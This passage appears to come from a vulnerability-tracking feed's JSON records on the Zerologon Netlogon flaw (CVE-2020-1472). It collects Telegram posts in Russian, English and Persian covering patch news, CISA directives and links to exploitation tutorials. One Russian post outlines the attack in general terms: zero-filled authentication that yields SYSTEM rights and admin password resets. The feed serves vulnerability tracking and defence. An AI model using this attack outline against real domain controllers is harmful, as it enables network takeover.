\u0434\u043e\u0441\u0442\u0443\u043f\u044b \u0438 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 \u0432\u0441\u0435\u0445 \u043c\u0430\u0448\u0438\u043d\u043a\u0430\u0445 \u0443 \u043d\u0435\u0433\u043e \u0443\u0436\u0435 \u0435\u0441\u0442\u044c.\n\n\u0422\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e \u044f \u043f\u043e\u043f\u044b\u0442\u0430\u043b\u0441\u044f \u043d\u0430 \u043f\u0430\u043b\u044c\u0446\u0430\u0445 \u0438 \u043e\u0447\u0435\u043d\u044c \u043a\u0440\u0430\u0442\u043a\u043e \u043e\u043f\u0438\u0441\u0430\u0442\u044c \u043f\u0440\u0438\u043d\u0446\u0438\u043f \u0440\u0430\u0431\u043e\u0442\u044b \u0441\u043b\u0443\u0436\u0431\u044b MS Active Directory. \u0412 \u0441\u0430\u043c\u043e\u0439 \u0441\u043b\u0443\u0436\u0431\u0435 \u0437\u0430 \u0440\u0430\u0437\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432 \u043f\u043e \u0433\u0440\u0443\u043f\u043f\u0430\u043c-\u0434\u043e\u043c\u0435\u043d\u0430\u043c \u043e\u0442\u0432\u0435\u0447\u0430\u044e\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u043e\u0432 (domain controller) \u0438 \u043e\u043d\u0438 \u0436\u0435 \u0441\u043b\u0435\u0434\u044f\u0442 \u0437\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0430\u0432 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u043c\u0441\u044f \u043a \u044d\u0442\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0435.\n\n\u041d\u043e \u043a\u0430\u043a \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430 \u0443\u0437\u043d\u0430\u0435\u0442, \u0447\u0442\u043e \u0442\u044b \u043f\u044b\u0442\u0430\u0435\u0448\u044c\u0441\u044f \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432 \u0435\u0433\u043e \u0433\u0440\u0443\u043f\u043f\u044b? \u0414\u043b\u044f \u044d\u0442\u0438\u0445 \u0446\u0435\u043b\u0435\u0439 \u0432 MS WIndows \u0435\u0441\u0442\u044c \u0441\u043b\u0443\u0436\u0431\u0430 Netlogon, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u0432\u0432\u0435\u0434\u0451\u043d\u043d\u044b\u0435 \u043d\u0430 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u043a\u0435, \u0434\u043e\u043d\u043e\u0441\u0438\u0442 \u0438\u0445 \u043f\u043e \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043a\u0430\u043d\u0430\u043b\u0443 \u0434\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430, \u0430 \u043f\u043e\u0441\u043b\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u043f\u043e \u0442\u043e\u043c\u0443 \u0436\u0435 \u043a\u0430\u043d\u0430\u043b\u0443 \u043f\u0440\u0430\u0432\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0432\u044b\u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e.\n\n\u0410 \u0442\u0443\u0442 \u043d\u0430\u0441 \u043f\u043e\u0434\u0436\u0438\u0434\u0430\u0435\u0442 \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c! \u0418 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0438\u043d\u0444\u043e\u043f\u043e\u0432\u043e\u0434 \u0432\u0441\u043f\u043e\u043c\u043d\u0438\u0442\u044c \u043f\u0440\u043e AD. \u0412 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 Microsoft \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0443 \u0434\u043b\u044f \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a Zerologon (CVE-2020-1472). \u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043a\u043e\u0448\u043c\u0430\u0440\u043d\u043e\u0441\u0442\u0438 \u0443 \u044d\u0442\u043e\u0439 \u0434\u044b\u0440\u044b \u0431\u044b\u043b \u043e\u0446\u0435\u043d\u0451\u043d \u043d\u0430 \u0432\u0441\u0435 10 \u0443\u0436\u0430\u0441\u043e\u0432 \u043f\u0430\u0440\u0430\u043d\u043e\u0438\u043a\u0430 \u0438\u0437 10. \n\n\u0421\u0430\u043c\u0430 \u0438\u0434\u0435\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u0435\u0451 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0438 \u2014 \u0441\u043f\u0430\u0441\u0438\u0431\u043e \u0432\u0441\u0435\u043c \u0446\u0435\u043d\u0438\u0442\u0435\u043b\u044f\u043c \u043a\u0430\u043b\u0430\u043c\u0431\u0443\u0440\u043e\u0432. \u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u043f\u043e Netlogon`\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u043e\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432, \u043d\u0430\u0447\u0438\u043d\u0430\u044e\u0449\u0435\u0439\u0441\u044f \u0441 \u043d\u0443\u043b\u0435\u0439. \u042d\u0442\u0430 \u043d\u0435\u043e\u0447\u0435\u0432\u0438\u0434\u043d\u0430\u044f \u0445\u0438\u0442\u0440\u043e\u0441\u0442\u044c \u0441\u043e\u0431\u044a\u0451\u0442 \u0441 \u0442\u043e\u043b\u043a\u0443 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0434\u0435\u043b\u0438\u0442 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043f\u0440\u0438\u0432\u0435\u043b\u0438\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 SYSTEM \u0438 \u0440\u0430\u0437\u0440\u0435\u0448\u0438\u0442 \u0441\u0431\u0438\u0432\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u043d\u0430 \u0430\u0434\u043c\u0438\u043d\u0441\u043a\u0438\u0445 \u0443\u0447\u0451\u0442\u043a\u0430\u0445.\n\n\u041d\u0430\u0438\u0432\u043d\u043e \u043e\u0436\u0438\u0434\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0443 \u043e\u0442 \u043c\u0435\u043b\u043a\u043e\u043c\u044f\u0433\u043a\u0438\u0445 \u0431\u044b\u0441\u0442\u0440\u043e-\u0440\u0435\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u0441\u0442\u0430\u0432\u044f\u0442 \u0432\u0441\u0435 \u0438 \u0441\u0440\u0430\u0437\u0443. \u041d\u043e \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u043d\u0435 \u0442\u0430\u043a. Microsoft \u0431\u044a\u0451\u0442 \u0442\u0440\u0435\u0432\u043e\u0433\u0443. \u0417\u0430\u043f\u043b\u0430\u0442\u043a\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0434\u0430\u043b\u0435\u043a\u043e \u043d\u0435 \u0432\u0441\u0435. \u041d\u0435\u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043d\u043e \u0444\u0430\u043a\u0442!\n\n\u041a\u0441\u0442\u0430\u0442\u0438, \u043d\u044b\u043d\u0435\u0448\u043d\u044f\u044f \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0430 \u043e\u0442 CVE-2020-1472 \u2014 \u044d\u0442\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u043a\u043e\u0441\u0442\u044b\u043b\u044c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0430\u0442\u0430\u043a\u0438. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c, \u043e\u043d \u0434\u043e\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u043a \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0443 \u0434\u043e\u043c\u0435\u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u043e\u043a \u0441\u043e \u0441\u0442\u0430\u0440\u044b\u043c\u0438 (legacy) \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438. \u041e\u0434\u043d\u0430\u043a\u043e \u0432 \u0436\u0443\u0440\u043d\u0430\u043b\u0430\u0445 \u0430\u0443\u0434\u0438\u0442\u0430 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0439 \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430\u0445 \u044d\u0442\u0438 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0438 \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u044e\u0442\u0441\u044f.\n\n\u041a 9 \u0444\u0435\u0432\u0440\u0430\u043b\u044f 2021 \u0433\u043e\u0434\u0430 Microsoft \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u0442 \u0440\u0430\u0437\u044a\u044f\u0441\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e-\u043a\u0430\u0440\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0431\u0435\u0441\u0435\u0434\u0443 \u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043f\u0430\u0442\u0447\u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442 \u043f\u043e\u043b\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u043f\u0430\u0442\u0447\u0430 \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 Zerologon, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c, \u043a\u0440\u043e\u043c\u0435 \u0432\u0441\u0435\u0433\u043e \u043f\u0440\u043e\u0447\u0435\u0433\u043e, \u0431\u0443\u0434\u0435\u0442 \u0432\u043e\u043e\u0431\u0449\u0435 \u0437\u0430\u043f\u0440\u0435\u0449\u0435\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0442\u0430\u0440\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0441\u043b\u0443\u0436\u0431\u044b. \u0420\u0430\u0443\u043d\u0434!\n\n\u0418 \u043a \u044d\u0442\u043e\u043c\u0443 \u0442\u043e\u0436\u0435 \u043d\u0430\u0434\u043e \u0431\u044b\u0442\u044c \u0433\u043e\u0442\u043e\u0432\u044b\u043c\u0438.\n\n\u041a\u0441\u0442\u0430\u0442\u0438, \u0435\u0441\u043b\u0438 \u0442\u044b \u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0448\u044c\u0441\u044f \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c\u0438 \u0443\u0447\u0451\u0442\u043a\u0430\u043c\u0438, \u0442\u043e \u044d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0435\u0431\u0435 \u043d\u0435 \u0441\u0442\u0440\u0430\u0448\u043d\u0430. \u041c\u043e\u0436\u0435\u0448\u044c \u0432\u043e\u0441\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u044d\u0442\u0443 \u0441\u0442\u0430\u0442\u044c\u044e, \u043a\u0430\u043a \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0432\u0435\u0442\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u0443\u044e.", "creation_timestamp": "2020-11-11T18:40:22.000000Z"}, {"uuid": "9697ee94-1640-4131-953f-58d5156e739a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "Telegram/0sD_EyHySREvSWLaWKL-XHqTqDduPkHhIy1vEKF4pCPQbv8", "content": "", "creation_timestamp": "2020-10-28T02:58:38.000000Z"}, {"uuid": "0d0f9689-5b2e-4104-99b6-2da3fd86da2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/LearnExploit/1583", "content": "CVE-2020-1472 - Netlogon Elevation of Privilege Vulnerability\n\nLink \n\u2014\u2014\u2014\u2014\u2014\u2014\u2067\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2024-04-11T19:25:28.000000Z"}, {"uuid": "f2be8808-2103-4363-bea0-1f08ef5ad54e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/cibsecurity/22224", "content": "\u274c Microsoft Implements Windows Zerologon Flaw \u2018Enforcement Mode\u2019 \u274c\n\nStarting Feb. 9, Microsoft will enable Domain Controller \u201cenforcement mode\u201d by default to address CVE-2020-1472.\n\n\ud83d\udcd6 Read\n\nvia \"Threat Post\".", "creation_timestamp": "2021-01-15T23:03:44.000000Z"}, {"uuid": "4fcfd549-165e-4655-8088-7c1664134ab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/gkfhdAVwawsafrkGE1Mwgdh3dAEK3lvSqdGyfRbpyGYsUw", "content": "", "creation_timestamp": "2020-09-17T10:56:34.000000Z"}, {"uuid": "4796e17f-15b2-4f33-9996-d801d50c37df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/haccking/103150", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\nZeroLogon \u0432 Windows Server. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f CVE-2020-1472", "creation_timestamp": "2021-12-23T14:01:44.000000Z"}, {"uuid": "9f8ab2de-4719-4307-8453-26d3287e4545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/haccking/92345", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Zerologon: CVE-2020-1472\nhttps://telegra.ph/Uyazvimost-Zerologon-CVE-2020-1472-10-08", "creation_timestamp": "2020-10-09T12:00:17.000000Z"}, {"uuid": "acf7bc77-d118-49ee-ac3f-71b47f18f98a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/information_security_channel/40489", "content": "Patch by Tonight: CISA Issues Emergency Directive for Critical Netlogon Flaw\nhttps://www.darkreading.com/vulnerabilities---threats/patch-by-tonight-cisa-issues-emergency-directive-for-critical-netlogon-flaw/d/d-id/1338971?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple\n\nThe directive requires all federal agencies to apply a patch for Windows Netlogon vulnerability CVE-2020-1472 by midnight on Sept. 21.", "creation_timestamp": "2020-09-21T17:20:38.000000Z"}, {"uuid": "95bf2595-d569-41f5-a8da-8a85b14f7bb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/information_security_channel/40368", "content": "CISA Issues Alert for Microsoft Netlogon Vulnerability\nhttps://www.darkreading.com/vulnerabilities---threats/cisa-issues-alert-for-microsoft-netlogon-vulnerability/d/d-id/1338920?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple\n\nCISA has issued an alert following the discovery of publicly available exploit code for Windows elevation of privilege flaw CVE-2020-1472.", "creation_timestamp": "2020-09-15T20:51:07.000000Z"}, {"uuid": "d7f22154-5cba-4206-a482-a3682d685fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/HackerOne/2732", "content": "Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472)\n\nhttps://www.secura.com/pathtoimg.php?id=2055", "creation_timestamp": "2020-09-14T17:11:38.000000Z"}, {"uuid": "57eaef41-8ff2-48ea-9a92-85302dd48f1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/xakep_ru/9895", "content": "\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 Zerologon \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0443\u0433\u0440\u043e\u0437\u0443 \u0434\u043b\u044f \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 NAS \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u0430 Qnap\n\n\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 Qnap \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Zerologon (CVE-2020-1472), \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f Microsoft \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0430\u0432\u0433\u0443\u0441\u0442\u043e\u0432\u0441\u043a\u043e\u0433\u043e \u00ab\u0432\u0442\u043e\u0440\u043d\u0438\u043a\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439\u00bb, \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u043e\u0434\u0435\u043b\u0435\u0439 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438.\n\nhttps://xakep.ru/2020/10/22/zerologon-qnap/", "creation_timestamp": "2020-10-22T19:05:11.000000Z"}, {"uuid": "6ebe57ed-21ea-46c5-a15e-b97e44adf3a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/canyoupwnme/6577", "content": "CVE-2020-1472 | Netlogon Elevation of Privilege Vulnerability\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472", "creation_timestamp": "2020-08-12T22:06:57.000000Z"}, {"uuid": "6b673542-89a8-490e-bdb9-22841f5cc692", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/SHATOOB/2885", "content": "\ud83c\udd94 @SHATOOB\n\n#CyberAttack\n#ZeroLogon\n\n\ud83c\udfa5 \u0646\u062d\u0648\u0647 Exploit \u06a9\u0631\u062f\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc ZeroLogon  \u062a\u0648\u0633\u0637 \u0645\u0647\u0627\u062c\u0645 \u0648 \u0627\u06cc\u062c\u0627\u062f \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0627\u06a9\u062a\u06cc\u0648 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc\n\n\ud83d\udd3a\u062f\u0631\u06cc\u0627\u0641\u062a \u067e\u0686 \u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0632 \u0648\u0628 \u0633\u0627\u06cc\u062a \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a\n\n\ud83c\udf10 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472\n\n\u269c\ufe0f\u269c\ufe0f  \u0634\u0627\u062a\u0648\u0628 \u062f\u0631\u06cc\u0686\u0647 \u0627\u06cc \u0628\u0647 \u062f\u0646\u06cc\u0627\u06cc \u0631\u0627\u06cc\u0627\u0646\u0647 \u269c\ufe0f\u269c\ufe0f\n\n\ud83c\udd94 @SHATOOB", "creation_timestamp": "2020-10-16T13:00:48.000000Z"}, {"uuid": "c05f6ad8-286e-42b5-8be2-9a172c7b1355", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/SHATOOB/2897", "content": "\ud83c\udd94 @SHATOOB\n\n#ZeroLogon\n\n\ud83d\udd3a\u0628\u06cc \u062a\u0641\u0627\u0648\u062a\u06cc \u0622\u0646\u062a\u06cc \u0648\u06cc\u0631\u0648\u0633 McAfee \u0646\u0633\u0628\u062a \u0628\u0647 \u062d\u0645\u0644\u0627\u062a ZeroLogon\n\n\ud83d\udd38 \u06cc\u06a9 \u0628\u0631\u0631\u0633\u06cc \u0627\u0646\u062c\u0627\u0645 \u0634\u062f\u0647 \u0646\u0634\u0627\u0646 \u0645\u06cc \u062f\u0647\u062f \u06a9\u0647 \u0622\u0646\u062a\u06cc \u0648\u06cc\u0631\u0648\u0633 McAfee \u0642\u0627\u062f\u0631 \u0628\u0647 \u062a\u0634\u062e\u06cc\u0635 \u062d\u0645\u0644\u0627\u062a ZeroLogon \u0646\u06cc\u0633\u062a . \u0627\u06cc\u0646 \u062f\u0631\u062d\u0627\u0644\u06cc\u0633\u062a \u06a9\u0647 \u062a\u0639\u062f\u0627\u062f \u0632\u06cc\u0627\u062f\u06cc \u0627\u0632 \u062f\u0633\u062a\u06af\u0627\u0647 \u0647\u0627\u06cc \u0645\u0647\u0645 \u062f\u0648\u0644\u062a\u06cc (\u0627\u0632\u062c\u0645\u0644\u0647 \u0628\u0631\u062e\u06cc \u0627\u0632 \u0633\u0627\u0632\u0645\u0627\u0646\u0647\u0627\u06cc \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0647 \u062f\u0631 \u062d\u0645\u0644\u0627\u062a \u0627\u062e\u06cc\u0631) \u0627\u0632 \u0622\u0646\u062a\u06cc \u0648\u06cc\u0631\u0648\u0633 McAfee \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0631\u062f\u0647 \u0627\u0646\u062f . \n\ud83d\udd38\u0645\u06a9\u0627\u0641\u06cc \u0628\u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646\u06a9\u0647 IP\u0647\u0627\u06cc \u0627\u06cc\u0631\u0627\u0646 \u0631\u0627 \u0645\u0633\u062f\u0648\u062f \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627\u06cc \u0622\u0646 \u0628\u0635\u0648\u0631\u062a \u063a\u06cc\u0631\u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc \u0634\u0648\u062f . \u0639\u062f\u0645 \u0627\u062a\u0635\u0627\u0644 \u0622\u0646\u062a\u06cc \u0648\u06cc\u0631\u0648\u0633 \u0647\u0627 \u0628\u0647 \u0633\u0631\u0648\u06cc\u0633\u0647\u0627\u06cc Cloud \u0634\u0631\u06a9\u062a \u0633\u0627\u0632\u0646\u062f\u0647 \u0628\u0627\u0639\u062b \u062d\u0630\u0641 \u0628\u0631\u062e\u06cc \u0627\u0632 \u0642\u0627\u0628\u0644\u06cc\u062a\u0647\u0627\u06cc Protection \u0646\u0638\u06cc\u0631 Online Behavior \u0645\u06cc \u0634\u0648\u062f \u06a9\u0647 \u0639\u0645\u062f\u062a\u0627 \u0628\u0627\u0639\u062b \u0645\u06cc\u0634\u0648\u062f \u0622\u0646\u062a\u06cc \u0648\u06cc\u0631\u0648\u0633 \u062f\u0631 \u062a\u0634\u062e\u06cc\u0635 \u062a\u0647\u062f\u06cc\u062f\u0627\u062a \u0646\u0648\u0638\u0647\u0648\u0631 \u0646\u0627\u062a\u0648\u0627\u0646 \u0634\u0648\u062f . \n\ud83d\udd38\u0627\u0632 \u0633\u0648\u06cc \u062f\u06cc\u06af\u0631 \u0631\u062a\u0628\u0647 \u0647\u0627\u06cc \u0645\u06a9\u0627\u0641\u06cc \u062f\u0631 \u0631\u0646\u06a9\u06cc\u0646\u06af\u0647\u0627\u06cc \u0645\u0639\u062a\u0628\u0631 \u062c\u0647\u0627\u0646\u06cc \u062f\u0631 \u0633\u0627\u0644\u0647\u0627\u06cc \u0627\u062e\u06cc\u0631 \u06a9\u0627\u0647\u0634 \u0686\u0634\u0645\u06af\u06cc\u0631\u06cc \u062f\u0627\u0634\u062a\u0647 \u0627\u0633\u062a .\n\ud83d\udd38\u0642\u0627\u0628\u0644 \u0630\u06a9\u0631 